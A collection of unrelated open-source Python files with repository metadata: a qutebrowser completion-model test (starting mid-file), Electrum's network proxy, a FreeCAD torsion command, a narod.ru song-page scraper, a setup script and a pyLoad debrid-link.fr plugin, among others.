from qutebrowser.api import cmdutils
@hypothesis.given(strategies.lists(
    min_size=0, max_size=3,
    elements=strategies.integers(min_value=0, max_value=2**31)))
def test_first_last_item(counts):
    """first() and last() must point at the first and last model items."""
    model = completionmodel.CompletionModel()
    for count in counts:
        category = mock.Mock(spec=['layoutChanged', 'layoutAboutToBeChanged'])
        category.rowCount = mock.Mock(return_value=count, spec=[])
        model.add_category(category)
    nonempty = [idx for idx, n in enumerate(counts) if n > 0]
    if nonempty:
        first_idx, last_idx = nonempty[0], nonempty[-1]
        # first item of the first non-empty category
        assert model.first_item().row() == 0
        assert model.first_item().parent().row() == first_idx
        # last item of the last non-empty category
        assert model.last_item().row() == counts[last_idx] - 1
        assert model.last_item().parent().row() == last_idx
    else:
        # with no items, first and last should be invalid indices
        assert not model.first_item().isValid()
        assert not model.last_item().isValid()
@hypothesis.given(strategies.lists(elements=strategies.integers(),
                                   min_size=0, max_size=3))
def test_count(counts):
    """count() is the sum of the row counts of all categories."""
    model = completionmodel.CompletionModel()
    for rows in counts:
        category = mock.Mock(spec=['rowCount', 'layoutChanged',
                                   'layoutAboutToBeChanged'])
        category.rowCount = mock.Mock(return_value=rows, spec=[])
        model.add_category(category)
    assert model.count() == sum(counts)
@hypothesis.given(pat=strategies.text())
def test_set_pattern(pat, qtbot):
    """set_pattern() must reach every category and emit layout signals."""
    model = completionmodel.CompletionModel()
    categories = []
    for _ in range(3):
        category = mock.Mock(spec=['set_pattern'])
        category.set_pattern = mock.Mock(spec=[])
        model.add_category(category)
        categories.append(category)
    expected_signals = [model.layoutAboutToBeChanged, model.layoutChanged]
    with qtbot.waitSignals(expected_signals, order='strict'):
        model.set_pattern(pat)
    for category in categories:
        category.set_pattern.assert_called_with(pat)
def test_delete_cur_item():
    """Deleting the current item invokes the category's delete_func."""
    delete_func = mock.Mock(spec=[])
    model = completionmodel.CompletionModel()
    model.add_category(
        listcategory.ListCategory('', [('foo', 'bar')], delete_func=delete_func))
    parent = model.index(0, 0)
    model.delete_cur_item(model.index(0, 0, parent))
    delete_func.assert_called_once_with(['foo', 'bar'])
def test_delete_cur_item_no_func():
    """Without a delete_func, deleting raises and removes no rows."""
    on_removed = mock.Mock(spec=[])
    model = completionmodel.CompletionModel()
    category = listcategory.ListCategory('', [('foo', 'bar')], delete_func=None)
    model.rowsAboutToBeRemoved.connect(on_removed)
    model.rowsRemoved.connect(on_removed)
    model.add_category(category)
    parent = model.index(0, 0)
    with pytest.raises(cmdutils.CommandError):
        model.delete_cur_item(model.index(0, 0, parent))
    on_removed.assert_not_called()
def test_delete_cur_item_no_cat():
    """Deleting with no selected category raises QtValueError."""
    on_removed = mock.Mock(spec=[])
    model = completionmodel.CompletionModel()
    model.rowsAboutToBeRemoved.connect(on_removed)
    model.rowsRemoved.connect(on_removed)
    with pytest.raises(qtutils.QtValueError):
        model.delete_cur_item(QModelIndex())
    on_removed.assert_not_called()
|
forkbong/qutebrowser
|
tests/unit/completion/test_completionmodel.py
|
Python
|
gpl-3.0
| 4,440
|
#
# Copyright 2003-2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# The presence of this file turns this directory into a Python package
"""
Core contents.
"""
# This is the main GNU Radio python module.
# We pull the swig output and the other modules into the ocvc.gr namespace
# If ocvc is installed then the swig output will be in this directory.
# Otherwise it will reside in ../../../swig.
import os

# Import the swig-generated runtime bindings.  When the package is
# installed they live alongside this file; in a source tree they are
# found in the swig build directory instead.
try:
    from runtime_swig import *
except ImportError:
    # Not installed: extend the package search path to the in-tree
    # swig output directory (../../../swig relative to this file).
    dirname, filename = os.path.split(os.path.abspath(__file__))
    __path__.append(os.path.join(dirname, "..", "..", "..", "swig"))
    from runtime_swig import *
from exceptions import *
from top_block import *
from hier_block2 import *
from tag_utils import *
from gateway import basic_block, sync_block, decim_block, interp_block

# Force the preference database to be initialized
prefs = prefs.singleton
|
atzengin/OCC
|
ocvc-runtime/python/ocvc/oc/__init__.py
|
Python
|
gpl-3.0
| 1,599
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import traceback
import threading
import Queue
import util
from network import Network, serialize_proxy, serialize_server
from simple_config import SimpleConfig
class NetworkProxy(util.DaemonThread):
    """Client-side proxy for a Network instance (Python 2 code).

    Runs as a daemon thread and exchanges JSON-RPC-style dict messages
    with the network over a pipe: either a SocketPipe to an external
    daemon process, or a QueuePipe to an in-process Network started here.
    Cached status fields (height, servers, banner, ...) are updated from
    'network.status' notifications.
    """

    def __init__(self, socket, config=None):
        """Create the proxy.

        socket: if truthy, talk to an external daemon through it;
            otherwise start an in-process Network over a QueuePipe.
        config: dict or SimpleConfig (plain dicts are wrapped).
        """
        if config is None:
            config = {}  # Do not use mutables as default arguments!
        util.DaemonThread.__init__(self)
        self.config = SimpleConfig(config) if type(config) == type({}) else config
        self.message_id = 0
        self.unanswered_requests = {}
        self.subscriptions = {}
        self.debug = False
        self.lock = threading.Lock()
        self.callbacks = {}
        if socket:
            self.pipe = util.SocketPipe(socket)
            self.network = None
        else:
            self.pipe = util.QueuePipe()
            self.network = Network(self.pipe, config)
            self.network.start()
            # Seed the queue with the current status values so clients
            # start from a consistent snapshot.
            for key in ['fee','status','banner','updated','servers','interfaces']:
                value = self.network.get_status_value(key)
                self.pipe.get_queue.put({'method':'network.status', 'params':[key, value]})
        # status variables
        self.status = 'unknown'
        self.servers = {}
        self.banner = ''
        self.blockchain_height = 0
        self.server_height = 0
        self.interfaces = []
        # value returned by estimatefee
        self.fee = None

    def run(self):
        """Main loop: pump jobs and dispatch pipe responses until stopped."""
        while self.is_running():
            self.run_jobs()  # Synchronizer and Verifier
            try:
                response = self.pipe.get()
            except util.timeout:
                continue
            if response is None:
                break
            # Protect against ill-formed or malicious server responses
            try:
                self.process(response)
            except:
                traceback.print_exc(file=sys.stderr)
        self.trigger_callback('stop')
        if self.network:
            self.network.stop()
        self.print_error("stopped")

    def process(self, response):
        """Dispatch one message from the pipe.

        'network.status' notifications update the cached state and fire
        callbacks; anything else is matched to a pending request by id,
        or to a subscription callback for server-initiated notifications.
        """
        if self.debug:
            self.print_error("<--", response)
        if response.get('method') == 'network.status':
            key, value = response.get('params')
            if key == 'status':
                self.status = value
            elif key == 'banner':
                self.banner = value
            elif key == 'fee':
                self.fee = value
            elif key == 'updated':
                self.blockchain_height, self.server_height = value
            elif key == 'servers':
                self.servers = value
            elif key == 'interfaces':
                self.interfaces = value
            # 'status'/'updated' callbacks take no payload; others get the value.
            if key in ['status', 'updated']:
                self.trigger_callback(key)
            else:
                self.trigger_callback(key, (value,))
            return
        msg_id = response.get('id')
        result = response.get('result')
        error = response.get('error')
        if msg_id is not None:
            with self.lock:
                method, params, callback = self.unanswered_requests.pop(msg_id)
        else:
            # Notification: find the subscriber registered for (method, params).
            method = response.get('method')
            params = response.get('params')
            with self.lock:
                for k,v in self.subscriptions.items():
                    if (method, params) in v:
                        callback = k
                        break
                else:
                    self.print_error("received unexpected notification",
                                     method, params)
                    return
        r = {'method':method, 'params':params, 'result':result,
             'id':msg_id, 'error':error}
        callback(r)

    def send(self, messages, callback):
        """return the ids of the requests that we sent"""
        # detect subscriptions
        sub = []
        for message in messages:
            m, v = message
            if m[-10:] == '.subscribe':
                sub.append(message)
        if sub:
            with self.lock:
                if self.subscriptions.get(callback) is None:
                    self.subscriptions[callback] = []
                for message in sub:
                    if message not in self.subscriptions[callback]:
                        self.subscriptions[callback].append(message)
        with self.lock:
            requests = []
            ids = []
            for m in messages:
                method, params = m
                request = { 'id':self.message_id, 'method':method, 'params':params }
                self.unanswered_requests[self.message_id] = method, params, callback
                ids.append(self.message_id)
                requests.append(request)
                if self.debug:
                    self.print_error("-->", request)
                self.message_id += 1
            self.pipe.send_all(requests)
            return ids

    def synchronous_get(self, requests, timeout=100000000):
        """Send requests and block until every response has arrived.

        Returns the results in request order.  Raises BaseException if
        any response carries an error.
        """
        queue = Queue.Queue()
        ids = self.send(requests, queue.put)
        id2 = ids[:]
        res = {}
        while ids:
            r = queue.get(True, timeout)
            _id = r.get('id')
            ids.remove(_id)
            if r.get('error'):
                raise BaseException(r.get('error'))
            result = r.get('result')
            res[_id] = r.get('result')
        out = []
        for _id in id2:
            out.append(res[_id])
        return out

    def get_servers(self):
        # last cached server list from 'network.status' notifications
        return self.servers

    def get_interfaces(self):
        return self.interfaces

    def get_local_height(self):
        return self.blockchain_height

    def get_server_height(self):
        return self.server_height

    def is_connected(self):
        return self.status == 'connected'

    def is_connecting(self):
        return self.status == 'connecting'

    def is_up_to_date(self):
        # up to date == no requests still awaiting a response
        return self.unanswered_requests == {}

    def get_parameters(self):
        return self.synchronous_get([('network.get_parameters', [])])[0]

    def set_parameters(self, host, port, protocol, proxy, auto_connect):
        """Persist the connection parameters and push them to the network."""
        proxy_str = serialize_proxy(proxy)
        server_str = serialize_server(host, port, protocol)
        self.config.set_key('auto_connect', auto_connect, False)
        self.config.set_key("proxy", proxy_str, False)
        self.config.set_key("server", server_str, True)
        # abort if changes were not allowed by config
        if self.config.get('server') != server_str or self.config.get('proxy') != proxy_str:
            return
        return self.synchronous_get([('network.set_parameters', (host, port, protocol, proxy, auto_connect))])[0]

    def stop_daemon(self):
        return self.send([('daemon.stop',[])], None)

    def register_callback(self, event, callback):
        with self.lock:
            if not self.callbacks.get(event):
                self.callbacks[event] = []
            self.callbacks[event].append(callback)

    def trigger_callback(self, event, params=()):
        # copy under the lock, invoke outside it
        with self.lock:
            callbacks = self.callbacks.get(event,[])[:]
        if callbacks:
            [callback(*params) for callback in callbacks]
|
shanew/electrum
|
lib/network_proxy.py
|
Python
|
gpl-3.0
| 7,926
|
from . import gui, srv
from util.columns import *
from util.misc import app_devtypes, app_devdata
devdata = lambda: app_devdata('NIO8', get_columns([c_ip_addr, c_serial]), app_devtypes(gui))
|
ivanovev/nio8
|
__init__.py
|
Python
|
gpl-3.0
| 194
|
#!/usr/bin/python
# coding=UTF-8
import re
# parse broken html from file using lxml.html parser and chardet encoding autodetection
def lxmlparse(filepath):
    """Parse (possibly broken) HTML from *filepath* into an lxml tree.

    chardet autodetects the document encoding before the decoded text is
    handed to the forgiving lxml.html parser.
    NOTE: Python 2 code — str.decode() relies on py2 byte-string semantics.
    """
    import lxml.html
    import chardet
    # Close the file handle deterministically (the original leaked it).
    with open(filepath) as fh:
        document = fh.read()
    print('Info: detecting document encoding...')
    document = document.decode(chardet.detect(document)['encoding'])
    return lxml.html.fromstring(document)
# function to import people names and addresses of pages which contain recordings and people data
def people():
    """Import people names and page addresses from the kkre index pages.

    NOTE(review): the bare ``return`` below disables the whole function —
    everything after it is dead code, and it references names (``fetch``,
    ``UnicodeDammit``, ``lxml``, ``models``, ``gender_from_name``) that
    are not defined in this module.  Presumably disabled on purpose after
    the initial import run — confirm before re-enabling.
    """
    return
    lists = [
        ('http://kkre-1.narod.ru/komp.htm','composers','individual'),
        ('http://kkre-1.narod.ru/poet.htm','poets','individual'),
        ('http://kkre-1.narod.ru/pevi.htm','performers','individual female'),
        ('http://kkre-1.narod.ru/pevc.htm','performers','individual male'),
        ('http://krapp-sa.narod.ru/','performers','group'),
    ]
    for address, category, comtype in lists:
        print('fetching ' + address + ' (category: ' + category + ', type: ' + comtype+')')
        # Type and subtype from combined type
        type = comtype.split(' ')[0]
        # Fetch and parse index page
        content = UnicodeDammit(open(fetch(address)).read(), is_html=True).unicode_markup
        doc = lxml.html.fromstring(content)
        for link in doc.cssselect('a'):
            # Ignore links that do not point to people pages
            if link.get('href') == 'http://kkre-1.narod.ru/': continue
            # Collect information and create a person record
            name = link.text_content()
            # Ensure that name is unique before going further
            if len(name) == 1: # Special case for 'first-letter' multi-person pages
                if address == 'http://kkre-1.narod.ru/pevi.htm': name = u'певицы на "' + name + '"'
                elif address == 'http://kkre-1.narod.ru/pevc.htm': name = u'певцы на "' + name + '"'
            # Check if name is already in database as 'kkre'-form ext_person_name
            # If already present - take its person and add new categories and links (if any), if not - create
            try:
                person = models.ExtPersonName.objects.get(form='kkre', name=name).person
            except models.ext_person_name.DoesNotExist:
                # back up kkre name
                name_kkre = name
                # normalize name
                name = re.sub('\s+', ' ', name) # multiple whitespaces
                name = name.strip() # trim
                # For individuals: put comma after non-shortable name part
                # It's usually a first word, but if the part in brackets follows, it's included
                if type == 'individual':
                    name_head = name.split(' ')[0]
                    name_tail = ''
                    flag_brackets = False
                    flag_head = True
                    for name_part in name.split(' ')[1:]:
                        # If we meet '('-beginning part - append everything till we find ')'-ending one
                        if name_part.startswith('('): flag_brackets = True
                        # Head ends at the first part that is neither bracketed nor the patronymic suffix
                        if not (flag_brackets or name_part.lower() == u'оглы'): flag_head = False
                        # closing ')' ends the bracketed run
                        if flag_brackets and name_part.endswith(')'): flag_brackets=False
                        # It's a part of non-shortable name part
                        if flag_head: name_head = name_head + ' ' + name_part
                        # End of non-shortable name part, place comma here
                        else: name_tail = name_tail + ' ' + name_part
                    name = name_head + ',' + name_tail
                # Restore current list subtype
                # This code shouldn't be here
                if len(comtype.split(' ')) < 2: subtype = ''
                else: subtype = comtype.split(' ')[1]
                if subtype == '': subtype = gender_from_name(name)
                # person still can already exist, if it wasn't created with this script and has no ext_person_name kkre alias
                person, created = models.Person.objects.get_or_create(name=name, type=type, subtype=subtype)
                # create kkre original name alias
                # this way we ensure that if we change person.name and re-run this script, a duplicate with the original kkre name won't be created
                models.ExtPersonName.objects.create(form='kkre', name=name_kkre, person=person)
            print '%s: %s' % (name, link.get('href'))
            # Explicit categories
            models.ExtPersonCategory.objects.get(category=category).people.add(person)
            # Page address (with fixes for two known-broken trailing-slash links)
            href = link.get('href')
            if href == 'http://kkre-2.narod.ru/gladkov.htm/': href = 'http://kkre-2.narod.ru/gladkov.htm'
            elif href == 'http://kkre-48.narod.ru/chuev.htm/': href = 'http://kkre-48.narod.ru/chuev.htm'
            page_link, created = models.ExtPersonLink.objects.get_or_create(href=href, format='kkre')
            page_link.people.add(person)
    # some manual name fixes (old name -> fixed name), e.g.:
    #   'Вокальный квартет "Гая"' -> 'вокально-инструментальный ансамбль "Гая"'
    #   'Ансамбль "Дружба"' -> 'вокально-инструментальный ансамбль "Дружба"'
    for name, name_fix in {
        u'Лазарев-Мильдон, Владимир Яковлевич':u'Лазарев (Лазарев-Мильдон), Владимир Яковлевич'
    }:
        person = models.person.objects.get(name=name)
        person.name = name_fix
        person.save()
# get text from lxml.html node from start till any non-allowed tag
# useful for parsing messy html (e. g. we know recording description line can contain italics and bold text, but there can be <br> inside <b> or <i>,
# and all text after that <br> is not a part of the description - so we call this function with allowedtags=['i','b'])
def inner_text_until_term(element, allowedtags, root=True):
    """Collect the inner text of *element* up to the first disallowed tag.

    Recursive: non-root calls return ``(text, stop)`` where ``stop`` True
    means a terminating (disallowed) tag was met; the root call returns
    only the accumulated text.  NOTE: Python 2 code (`unicode`).
    """
    # if it's a terminating tag - do not add any text and return a marker to stop
    # however, be permissive if root is True (this instance is the root of the recursion tree, called for a root node, which can be any tag)
    if not root and element.tag not in allowedtags: return '', True
    # otherwise, add element text and start iterating its children
    text = ''
    if type(element.text) is unicode: text+=element.text
    for child in element.getchildren():
        text_frag, stop = inner_text_until_term(child, allowedtags, False)
        text += text_frag
        # if a child has returned stop marker - stop and return text with stop, too (this will propagate recursively)
        if stop:
            # if root is True, this is our final result and we return only the text (same at the end)
            if not root: return text, True
            else: return text
    # tail text belongs to the parent's flow, appended only when no terminator was met
    if type(element.tail) is unicode: text += element.tail
    if not root: return text, False
    else: return text
def outher_text_until_term(element, allowedtags):
    """Collect text following *element* (its tail plus following siblings)
    up to the first disallowed tag.

    NOTE(review): fragments are appended one iteration late, so the
    fragment produced by the final ``inner_text_until_term`` call — the
    one that sets ``stop`` or ends the sibling chain — is never added to
    ``text``.  Looks intentional for the terminating run, but the
    loop-exhausted case may drop the last sibling's text — confirm.
    """
    stop = False
    text = (element.tail if element.tail is not None else '')
    text_frag = ''
    while not stop and element.getnext() is not None:
        element = element.getnext()
        text += text_frag
        text_frag, stop = inner_text_until_term(element, allowedtags, False)
    return text
# import people photos and descriptions
def person_data(page_filename):
    """Extract a person's photo URL and description text from their page.

    The photo is the <img> whose file basename matches the page's
    basename; the description is the <p> element directly following that
    image.  Returns a dict with optional 'image' and 'text' keys.
    """
    document = lxmlparse(page_filename)
    data = {}
    # get photo and description
    for image in document.cssselect('img'):
        # photo can be found by an img tag with image filename equal to page filename
        # (bugfix: the original compared against the undefined name `filename`
        # instead of the `page_filename` parameter, raising NameError)
        if '.'.join(page_filename.split('/')[-1].split('.')[:-1])=='.'.join(image.get('src').split('/')[-1].split('.')[:-1]):
            # first, we need to mirror the image
            #image_link='/'.join(page_link.href.split('/')[:-1])+'/'+image.get('src')
            data['image'] = image.get('src')
            # description is in p next to this img
            # or the only p between img and first recording link
            # or the first p after <CENTER><H2>{{ name_short }}</CENTER></H2>
            if image.getnext() is not None and image.getnext().tag == 'p':
                data['text'] = inner_text_until_term(image.getnext(), ['br']).strip()
            break
    return data
# import recordings
def recordings(page_filename):
    """Collect recording entries (audio files and melody.su disk links)
    from a person's page.

    Returns a list of dicts with keys href, title, description and
    legal_status.  NOTE: Python 2 code (print statement).
    """
    document = lxmlparse(page_filename)
    recordings = []
    # get all links
    for link in document.cssselect('a'):
        href = link.get('href')
        title = link.text_content().strip()
        legal_status = ''
        # Filter recording links
        # Audiofiles
        if href is None: continue # mistyped <a> instead of </a>, http://kkre-34.narod.ru/monin/ulu.mp3
        if not href[-4:] in ['.mp3', '.ogg', '.wma', '.wav', '.vqf']:
            # melody.su links: let's assume there can be only one title on a one disk
            # Problem: there are multi-line links for multiple recordings on a same disk
            if 'melody.su' in href and href.split('melody.su')[1] not in ['', '/']:
                # make the href unique per-title by appending the title as a fragment
                href = href + '#' + title
                legal_status = 'deleted'
                # We might also want to set some flag indicating that recording is deleted by copyright holder
            else: continue
        description = outher_text_until_term(link, ['b', 'i']).strip()
        print '%s: "%s" %s' % (href, title, description)
        recordings.append({'href':href, 'title':title, 'description':description, 'legal_status':legal_status})
    return recordings
def result_from_recording_description(description):
    """Parse a recording description into per-role people lists.

    Expected shape: optional '(<authors>)' prefix — either a single
    authors list or 'composers - poets' — followed by a performers list.
    Returns a dict keyed by 'authors'/'composers'/'poets'/'performers';
    each value is {'flags': [...], 'people': [...], 'people_filtered': [...]}.
    Returns None on parse errors.  NOTE: Python 2 code (print statements,
    u''-literals).
    """
    result = {}
    # split description string into authors and performers
    strings = {}
    description = description.strip()
    if not description: # empty description, but we can still use subjects list
        print 'Warning: empty descripton'
    elif description[0] == '(':
        description = description.split(')')
        if len(description) > 1:
            description[0] = re.sub('^\s.\(', '', description[0])[1:].strip()
            if '(' in description[0]:
                print('Error: description string parse error 1')
                return
            # normalize all dash variants to '-' before splitting composers/poets
            description[0] = description[0].replace(u'―', u'-').replace(u'—', u'-').replace(u'–', u'-').replace(u'‒', u'-').replace(u'‑', u'-').replace(u'‐', u'-')
            description[0] = description[0].split(' - ')
            if len(description[0]) == 1:
                strings['authors'] = description[0][0]
            elif len(description[0]) == 2:
                strings['composers'] = description[0][0]
                strings['poets'] = description[0][1]
            else:
                print('Error: description string parse error 2')
                return
            description[1] = ')'.join(description[1:]).strip() # if there are other bracketed parts after authors
            # if description[1] is not empty, it's a performers list
            if description[1]:
                strings['performers'] = description[1]
        else: # begins with '(', but has no ')'
            print('Error: description string parse error 3')
    else: # no authors, all description is a performers list
        if description:
            strings['performers'] = description
    for key in strings.keys():
        # name list dividers
        strings[key] = strings[key].replace(',', ';')
        # in certain contexts 'и' is not a divider
        # e. g. 'Хор ВР и ЦТ'
        strings[key] = strings[key].replace(u' и ', ';')
        # in certain contexts '/' is not a divider
        # e. g. 'х/ф', 'п/у'
        # let's assume all of them have '<start_of_line_or_whitespace><single_character>/<single_character><whitespace_or_end_of_line>' pattern,
        # and any '/' out of this pattern to be a name divider
        # I failed to write a 'start_(end)_of_line or whitespace' expression in a regexp, so I add border whitespaces which will be trimmed later
        strings[key] = ' ' + strings[key] + ' '
        strings[key] = re.sub('(?<!\s\S)/', ';', re.sub('/(?!\S\s)', ';', strings[key]))
        # create an empty result item
        result[key] = {'flags':[], 'people':[], 'people_filtered':[]}
        # split list into names and fill result item people list with them
        result[key]['people'] = strings[key].split(';')
        # clean up a little
        result[key]['people'] = [re.sub('\s+', ' ', re.sub('\.\s*', '. ', name)).strip() for name in result[key]['people']]
        # incomplete strings: if a string begins with 'with ...', it means its set must be completed with people from page subjects set,
        # and people names in this string are given in instrumental case
        for prefix in [u'с ', u'c ', u'со ', u'вместе с ', u'дуэт с ', u'в дуэте с ']:
            if result[key]['people'][0].startswith(prefix):
                result[key]['people'][0] = result[key]['people'][0][len(prefix):]
                result[key]['flags'].append('incomplete')
        # convert cases
        import _ru_mystem_inflect
        for idx in range(0, len(result[key]['people'])):
            name_norm = _ru_mystem_inflect.name_instrumental_to_nominative(result[key]['people'][idx])
            if name_norm is None:
                print('Warning: case normalization failed for name "' + result[key]['people'][idx] + '"')
                # add 'с ' prefix to the beginning of the name
            else:
                # if normalized name differs from original - add original form to people_filtered and replace it with normalized in people
                if result[key]['people'][idx] != name_norm:
                    print('Info: case normalization: "' + result[key]['people'][idx] + '" -> "' + name_norm + '"')
                    result[key]['people_filtered'].append(result[key]['people'][idx])
                    result[key]['people'][idx] = name_norm
                    # NOTE(review): this break stops normalizing after the first
                    # changed name — original nesting lost in extraction; confirm.
                    break
    return result
|
shatsky/museion
|
management/commands/_import_kkre.py
|
Python
|
gpl-3.0
| 14,222
|
from pathlib import Path
from PySide2 import QtCore
import FreeCADGui as Gui
class CivilShowTorsion:
    """FreeCAD command that shows the torsion-check dialog for a structure."""

    def GetResources(self):
        """Return the icon, menu text and tooltip describing this command."""
        icon_path = (
            Path(__file__).parent.absolute().parent / "images" / "torsion.svg"
        )
        return {
            'Pixmap': str(icon_path),
            'MenuText': QtCore.QT_TRANSLATE_NOOP(
                "civil_torsion",
                "Torsion"),
            'ToolTip': QtCore.QT_TRANSLATE_NOOP(
                "civil_torsion",
                "Get Torsion of Structure"),
        }

    def Activated(self):
        """Run the command: verify usage allowance, connect to ETABS, show the dialog."""
        from gui_civiltools.gui_check_legal import (
            allowed_to_continue,
            show_warning_about_number_of_use,
        )
        allow, check = allowed_to_continue(
            'torsion.bin',
            'https://gist.githubusercontent.com/ebrahimraeyat/d1591790a52a62b3e66bb70f45738105/raw',
            'cfactor',
            n=2,
        )
        if not allow:
            return
        from py_widget import torsion
        import etabs_obj
        etabs = etabs_obj.EtabsModel(backup=False)
        if not etabs.success:
            from PySide2.QtWidgets import QMessageBox
            QMessageBox.warning(None, 'ETABS', 'Please open etabs file!')
            return False
        dialog = torsion.Form(etabs)
        Gui.Control.showDialog(dialog)
        show_warning_about_number_of_use(check)

    def IsActive(self):
        """The command is always available."""
        return True
|
ebrahimraeyat/civilTools
|
gui_civiltools/gui_show_torsion.py
|
Python
|
gpl-3.0
| 1,522
|
from setuptools import setup, find_packages
import sys, os
version = '1.1'
setup(name='raisin.mysqldb',
version=version,
description="",
long_description="""\
""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
namespace_packages = ['raisin'],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
|
rna-seq/raisin.mysqldb
|
setup.py
|
Python
|
gpl-3.0
| 684
|
# -*- coding: utf-8 -*-
import time
import Crypto.Hash.SHA
import pycurl
from module.plugins.internal.misc import json
from module.plugins.internal.MultiHoster import MultiHoster
def args(**kwargs):
    """Collect keyword arguments into a plain dict (request-payload helper)."""
    payload = dict(kwargs)
    return payload
class DebridlinkFr(MultiHoster):
    """Multi-hoster plugin for the debrid-link.fr downloader service."""

    __name__ = "DebridlinkFr"
    __type__ = "hoster"
    __version__ = "0.02"
    __status__ = "testing"

    __pattern__ = r'^unmatchable$'
    __config__ = [("activated", "bool", "Activated", True),
                  ("use_premium", "bool", "Use premium account if available", True),
                  ("fallback",
                   "bool",
                   "Fallback to free download if premium fails",
                   False),
                  ("chk_filesize", "bool", "Check file size", True),
                  ("max_wait", "int",
                   "Reconnect if waiting time is greater than minutes", 10),
                  ("revert_failed", "bool", "Revert to standard download if fails", True)]

    # Bugfix: description previously read "Debrid-slink.fr" (typo).
    __description__ = """Debrid-link.fr multi-hoster plugin"""
    __license__ = "GPLv3"
    __authors__ = [("GammaC0de", "nitzo2001[AT]yahoo[DOT]com")]

    API_URL = "https://debrid-link.fr/api"

    def api_request(self, method, data=None, get={}, post={}):
        """Call a debrid-link.fr API endpoint and return the decoded JSON.

        When the account holds a session, the request is signed with
        SHA1(timestamp + method + session key) and sent via the
        X-DL-TOKEN / X-DL-SIGN / X-DL-TS headers.
        NOTE: `data` is kept for interface compatibility but is unused.
        """
        session = self.account.info['data'].get('session', None)
        if session:
            # timestamp is relative to the session's time delta ('tsd')
            ts = str(int(time.time() - float(session['tsd'])))
            sha1 = Crypto.Hash.SHA.new()
            sha1.update(ts + method + session['key'])
            sign = sha1.hexdigest()
            self.req.http.c.setopt(pycurl.HTTPHEADER, ["X-DL-TOKEN: " + session['token'],
                                                       "X-DL-SIGN: " + sign,
                                                       "X-DL-TS: " + ts])
        json_data = self.load(self.API_URL + method, get=get, post=post)
        return json.loads(json_data)

    def handle_premium(self, pyfile):
        """Queue *pyfile* on the downloader API and adopt the returned link/metadata."""
        res = self.api_request("/downloader/add", post=args(link=pyfile.url))
        if res['result'] == "OK":
            self.link = res['value']['downloadLink']
            pyfile.name = res['value'].get('filename', None) or pyfile.name
            # keep existing defaults when the API omits resume/chunk hints
            self.resume_download = res['value'].get(
                'resume') or self.resume_download
            self.chunk_limit = res['value'].get('chunk') or self.chunk_limit
|
rlindner81/pyload
|
module/plugins/hoster/DebridlinkFr.py
|
Python
|
gpl-3.0
| 2,327
|